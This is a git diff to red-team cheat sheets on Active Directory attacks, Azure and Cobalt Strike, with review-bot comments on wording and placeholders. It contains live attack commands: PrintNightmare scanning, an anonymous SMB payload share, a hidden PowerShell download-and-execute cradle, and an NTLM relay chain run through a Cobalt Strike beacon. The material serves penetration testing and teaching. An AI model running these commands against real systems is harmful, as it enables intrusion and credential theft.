diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 229f069..4fb51bd 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -601,19 +601,20 @@ Requirements: **Detect the vulnerability**: * Impacket - [rpcdump](https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/rpcdump.py) ```ps1 - python3 ./rpcdump.py @10.0.2.10 | grep MS-RPRN + python3 ./rpcdump.py @10.0.2.10 | egrep 'MS-RPRN|MS-PAR' Protocol: [MS-RPRN]: Print System Remote Protocol ``` * [It Was All A Dream](https://github.com/byt3bl33d3r/ItWasAllADream) ```ps1 git clone https://github.com/byt3bl33d3r/ItWasAllADream cd ItWasAllADream && poetry install && poetry shell - itwasalladream -u user -p password -d domain 192.168.1.0/24 + itwasalladream -u user -p Password123 -d domain 10.10.10.10/24 + docker run -it itwasalladream -u username -p Password123 -d domain 10.10.10.10 ``` **Trigger the exploit**: -**NOTE**: The payload can be hosted on Impacket SMB server since [PR #1109](https://github.com/SecureAuthCorp/impacket/pull/1109): `python3 ./smbserver.py share /tmp/smb/` +**NOTE**: The payload can be hosted on Impacket SMB server since [PR #1109](https://github.com/SecureAuthCorp/impacket/pull/1109): `python3 ./smbserver.py share /tmp/smb/` or using [Invoke-BuildAnonymousSMBServer](https://github.com/3gstudent/Invoke-BuildAnonymousSMBServer/blob/main/Invoke-BuildAnonymousSMBServer.ps1) : `Import-Module .\Invoke-BuildAnonymousSMBServer.ps1; Invoke-BuildAnonymousSMBServer -Path C:\Share -Mode Enable` * [SharpNightmare](https://github.com/cube0x0/CVE-2021-1675) ```powershell 
@@ -2873,4 +2874,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae * [Playing with PrintNightmare - 0xdf - Jul 8, 2021](https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html) * [Attacking Active Directory: 0 to 0.9 - Eloy Pérez González - 2021/05/29](https://zer1t0.gitlab.io/posts/attacking_ad/) * [Microsoft ADCS – Abusing PKI in Active Directory Environment - Jean MARSAULT - 14/06/2021](https://www.riskinsight-wavestone.com/en/2021/06/microsoft-adcs-abusing-pki-in-active-directory-environment/) -* [Certified Pre-Owned - Will Schroeder and Lee Christensen - June 17, 2021](http://www.harmj0y.net/blog/activedirectory/certified-pre-owned/) \ No newline at end of file +* [Certified Pre-Owned - Will Schroeder and Lee Christensen - June 17, 2021](http://www.harmj0y.net/blog/activedirectory/certified-pre-owned/) +* [NTLM relaying to AD CS - On certificates, printers and a little hippo - Dirk-jan Mollema](https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/) \ No newline at end of file diff --git a/Methodology and Resources/Cloud - Azure Pentest.md b/Methodology and Resources/Cloud - Azure Pentest.md index 349a3f9..c665353 100644 --- a/Methodology and Resources/Cloud - Azure Pentest.md +++ b/Methodology and Resources/Cloud - Azure Pentest.md @@ -1037,7 +1037,7 @@ Use the script **azuread_decrypt_msol.ps1** from @xpn to recover the decrypted p Now you can use the retrieved credentials for the MSOL Account to launch a DCSync attack. -## Azure AD Connect - Seamless Single Sign On Silver Ticket +### Azure AD Connect - Seamless Single Sign On Silver Ticket > Anyone who can edit properties of the AZUREADSSOACCS$ account can impersonate any user in Azure AD using Kerberos (if no MFA) diff --git a/Methodology and Resources/Cobalt Strike - Cheatsheet.md b/Methodology and Resources/Cobalt Strike - Cheatsheet.md index 782e920..de13806 100644 --- a/Methodology and Resources/Cobalt Strike - Cheatsheet.md 
+++ b/Methodology and Resources/Cobalt Strike - Cheatsheet.md @@ -37,6 +37,7 @@ $ powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstri * [Resource Kit](#resource-kit) * [Artifact Kit](#artifact-kit) * [Mimikatz Kit](#mimikatz-kit) +* [NTLM Relaying via Cobalt Strike](#ntlm-relaying-via-cobalt-strike) * [References](#references) @@ -169,6 +170,7 @@ $ %windir%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe \\10.10.10.10\Shared\d * Cobalt Strike - Malleable C2 Profiles https://github.com/xx0hcd/Malleable-C2-Profiles * Cobalt Strike Malleable C2 Design and Reference Guide https://github.com/threatexpress/malleable-c2 * Malleable-C2-Profiles https://github.com/rsmudge/Malleable-C2-Profiles +* SourcePoint is a C2 profile generator https://github.com/Tylous/SourcePoint ```powershell set useragent "SOME AGENT"; # GOOD @@ -472,6 +474,16 @@ Artifact Kit (Cobalt Strike 4.0) - https://www.youtube.com/watch?v=6mC21kviwG4 : * Load the mimikatz.cna aggressor script * Use mimikatz functions as normal +## NTLM Relaying via Cobalt Strike + +```powershell +beacon> socks 1080 +kali> proxychains python3 /usr/local/bin/ntlmrelayx.py -t smb:// +beacon> rportfwd_local 8445 445 +beacon> upload C:\Tools\PortBender\WinDivert64.sys +beacon> PortBender redirect 445 8445 +``` + ## References * [Red Team Ops with Cobalt Strike (1 of 9): Operations](https://www.youtube.com/watch?v=q7VQeK533zI) 
@@ -487,4 +499,5 @@ Artifact Kit (Cobalt Strike 4.0) - https://www.youtube.com/watch?v=6mC21kviwG4 : * [Cobalt Strike. Walkthrough for Red Teamers - Neil Lines - 15 Apr 2019](https://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/) * [TALES OF A RED TEAMER: HOW TO SETUP A C2 INFRASTRUCTURE FOR COBALT STRIKE – UB 2018 - NOV 25 2018](https://holdmybeersecurity.com/2018/11/25/tales-of-a-red-teamer-how-to-setup-a-c2-infrastructure-for-cobalt-strike-ub-2018/) * [Cobalt Strike - DNS Beacon](https://www.cobaltstrike.com/help-dns-beacon) -* [How to Write Malleable C2 Profiles for Cobalt Strike - January 24, 2017](https://bluescreenofjeff.com/2017-01-24-how-to-write-malleable-c2-profiles-for-cobalt-strike/) \ No newline at end of file +* [How to Write Malleable C2 Profiles for Cobalt Strike - January 24, 2017](https://bluescreenofjeff.com/2017-01-24-how-to-write-malleable-c2-profiles-for-cobalt-strike/) +* [NTLM Relaying via Cobalt Strike - July 29, 2021 - Rasta Mouse](https://rastamouse.me/ntlm-relaying-via-cobalt-strike/) \ No newline at end of file
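Review bot: in the Active Directory Attack.md hunk at @@ -601, widening the filter to `egrep 'MS-RPRN|MS-PAR'` is sensible, but the sample output beneath it still shows only `Protocol: [MS-RPRN]: Print System Remote Protocol`; either add the matching MS-PAR output line or state that exposure of either endpoint is what the check is looking for, and prefer `grep -E`, since `egrep` is deprecated in current GNU grep. The new `itwasalladream` examples use `10.10.10.10/24`, which has host bits set; `10.10.10.0/24` is an unambiguous network placeholder. The `docker run -it itwasalladream ...` line assumes an image named `itwasalladream` already exists, but the step that produces it is not shown in the hunk, so add it or say where it comes from. For the Invoke-BuildAnonymousSMBServer note, document how the anonymous share is removed again afterwards; an anonymous SMB share left enabled on the operator host is a weakness in its own right.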
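Review bot: in the Active Directory Attack.md references hunk at @@ -2873, the new Dirk-jan Mollema entry is the only one in the list without a date, while every neighbouring entry carries one; add it for consistency. The file also still ends without a trailing newline on both sides of the hunk (`\ No newline at end of file`), which will keep generating noisy one-line diffs each time the list grows; end the file with a newline.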
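Review bot: in the Cloud - Azure Pentest.md hunk at @@ -1037, demoting the heading from `##` to `###` changes its nesting under the preceding Azure AD Connect material; check that any table of contents entry or anchor link pointing at this section still matches the new level, since the hunk does not touch those.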
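Review bot: in the Cobalt Strike - Cheatsheet.md hunk at @@ -472, the new NTLM Relaying section is a bare command block with no explanation, and it is fenced as `powershell` although it mixes `beacon>` and `kali>` prompts with a Python invocation; use a plain fence and add one sentence per step (what the SOCKS proxy, the `rportfwd_local 8445 445` reverse forward and the `PortBender redirect 445 8445` redirection each do) so the reader is not left to reverse-engineer it. `-t smb://` has no target; mark it as a placeholder. The `upload C:\Tools\PortBender\WinDivert64.sys` step implies a kernel driver is loaded on the beacon host, which is a prerequisite worth stating and a loud, easily logged event, and a short caveat that the relay fails where SMB signing is enforced on the target would make the section honest about its limits.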
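Review bot: in the Cobalt Strike - Cheatsheet.md references hunk at @@ -487, the new Rasta Mouse entry orders title - date - author, while the neighbouring entries use title - author - date (e.g. `Neil Lines - 15 Apr 2019`); reorder it for consistency, and end the file with a newline so the `\ No newline at end of file` marker stops reappearing on every edit to the list.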